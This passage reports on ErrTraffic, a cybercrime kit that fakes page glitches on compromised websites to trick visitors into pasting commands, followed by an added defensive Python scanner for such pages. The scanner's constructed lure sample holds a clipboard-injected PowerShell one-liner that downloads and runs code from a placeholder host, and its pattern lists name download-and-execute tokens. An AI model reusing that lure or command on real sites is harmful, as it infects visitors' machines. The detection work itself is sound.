ErrTraffic is a new cybercrime platform first promoted on Russian-speaking hacking forums earlier this month by someone using the alias LenAI.
The attacker must already control a website that receives victim traffic, or have injected malicious code into a legitimate, compromised website, and then adds ErrTraffic to it with a single HTML line.
The site's behavior remains the same for regular visitors who do not match the targeting criteria, but when the geolocation and OS fingerprinting conditions are met, the page's DOM is modified to display a visual glitch. The glitches include corrupted or illegible text, fonts replaced with symbols, fake Chrome update prompts, or "missing system font" errors. This makes the page appear broken and creates the pretext for offering the victim a 'solution': installing a browser update, downloading a system font, or pasting something into the command prompt.
If the victim follows the instructions, a PowerShell command is placed on the clipboard by JavaScript code. Executing that command downloads a payload.
ErrTraffic clients can define the payload for each targeted architecture and specify the countries that qualify for infection. However, there is a hardcoded exclusion for CIS (Commonwealth of Independent States) countries, which may indicate the origin of ErrTraffic's developer.
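The mechanism described above (a client-side OS check, a fake error overlay, and a JavaScript clipboard write that hands the victim a PowerShell one-liner) leaves recognizable traces in a page's source. The following Python scanner is an added example written for this page; it is not code from the article or from ErrTraffic, and its indicator regexes and the two sample pages are constructed for illustration (the URL in the sample is a placeholder). It flags a page as likely ClickFix only when a clipboard-write API and PowerShell-style strings co-occur with lure text steering the user to the Run dialog or a terminal.

```python
import re
from typing import Dict, List

# Indicator families, each a list of case-insensitive regexes run over raw page
# source (HTML plus inline script). Illustrative patterns, not a complete signature set.
INDICATORS: Dict[str, List[str]] = {
    # JavaScript APIs that can place text on the clipboard without a user selection
    "clipboard_write": [
        r"navigator\.clipboard\.writeText\s*\(",
        r"execCommand\s*\(\s*['\"]copy['\"]\s*\)",
        r"clipboardData\.setData\s*\(",
    ],
    # Strings typical of a PowerShell one-liner that fetches and runs remote content
    "powershell_command": [
        r"\bpowershell(\.exe)?\b",
        r"\bpwsh\b",
        r"\b(iex|invoke-expression)\b",
        r"\b(iwr|invoke-webrequest|downloadstring|downloadfile)\b",
        r"-(e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}",
    ],
    # Social-engineering text steering the visitor to the Run dialog or a terminal
    "lure_text": [
        r"\bwin(dows)?\s*(key)?\s*\+\s*r\b",
        r"\bctrl\s*\+\s*v\b",
        r"\brun\s+dialog\b",
        r"\bpaste\b.{0,40}\b(enter|ok)\b",
    ],
    # Client-side OS checks used to show the lure only to targeted visitors
    "os_fingerprint": [
        r"navigator\.(userAgent|platform|userAgentData)",
    ],
}


def scan_page(source: str) -> Dict[str, object]:
    """Return matched indicator snippets per family plus an overall verdict."""
    hits: Dict[str, List[str]] = {}
    for family, patterns in INDICATORS.items():
        found: List[str] = []
        for pat in patterns:
            for m in re.finditer(pat, source, re.IGNORECASE):
                snippet = m.group(0)
                if snippet not in found:
                    found.append(snippet)
        hits[family] = found

    # A clipboard write alone is common (copy buttons); the combination with a
    # PowerShell-style command is what makes the page suspicious, and lure text
    # pushing the user to execute it is the ClickFix signature.
    if hits["clipboard_write"] and hits["powershell_command"]:
        verdict = "likely_clickfix" if hits["lure_text"] else "suspicious"
    else:
        verdict = "no_clickfix_indicators"
    return {"verdict": verdict, "indicators": hits}


# Constructed sample: an ordinary documentation page with a copy-to-clipboard button.
BENIGN_PAGE = """
<button onclick="navigator.clipboard.writeText(document.getElementById('snippet').textContent)">Copy</button>
<pre id="snippet">pip install requests</pre>
"""

# Constructed sample modelled on the lure described in the article (placeholder URL).
LURE_PAGE = """
<div id="err">The font "Roboto" could not be loaded. To fix this, press Win + R,
press Ctrl + V and hit Enter.</div>
<script>
  if (navigator.userAgent.indexOf("Windows") !== -1) {
    document.body.addEventListener("click", function () {
      navigator.clipboard.writeText('powershell -c "iwr http://placeholder.invalid/f | iex"');
    });
  }
</script>
"""

if __name__ == "__main__":
    for name, page in (("benign", BENIGN_PAGE), ("lure", LURE_PAGE)):
        result = scan_page(page)
        print(f"{name}: {result['verdict']}")
        for family, snippets in result["indicators"].items():
            if snippets:
                print(f"  {family}: {snippets}")
```

Running the block reports the benign page as having no ClickFix indicators (its clipboard write is ignored because no PowerShell strings accompany it) and the lure page as likely ClickFix, listing the clipboard call, the PowerShell tokens, the Win+R and Ctrl+V instructions, and the user-agent check. The same function can be pointed at proxy-captured responses or a crawler's page archive to triage injected content on sites a defender monitors.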
A new cybercrime tool called ErrTraffic allows threat actors to automate ClickFix attacks by generating 'fake glitches' on compromised websites to lure users into downloading payloads or following malicious instructions
www.bleepingcomputer.com